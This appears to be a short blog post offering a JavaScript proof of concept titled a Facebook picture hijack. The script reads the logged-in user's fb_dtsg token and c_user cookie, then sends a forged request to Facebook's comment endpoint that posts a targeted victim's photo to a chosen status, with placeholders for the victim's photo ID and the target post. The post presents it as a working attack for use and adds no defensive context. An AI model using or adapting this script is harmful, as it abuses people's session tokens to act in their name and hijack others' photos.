Javascript Facebook Picture Hijack PoC


var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack

function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = '';
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt(c)
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=')[1].split(';')[0],
h = "ft_ent_identifier="+statuslinkID+"&comment_text="+yourMessage +"&source=1&client_id=1371674471412:1000847939&attached_photo_fbid="+photofbID+"&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + c + "&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=" + e;
m = generatePhstamp(h, e);
h += "&phstamp=" + m;
picture = new XMLHttpRequest();
picture.open("POST", "https://www.facebook.com/ajax/ufi/add_comment.php", true);
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted at http://facebook.com/"+statuslinkID);
</div>


0 nhận xét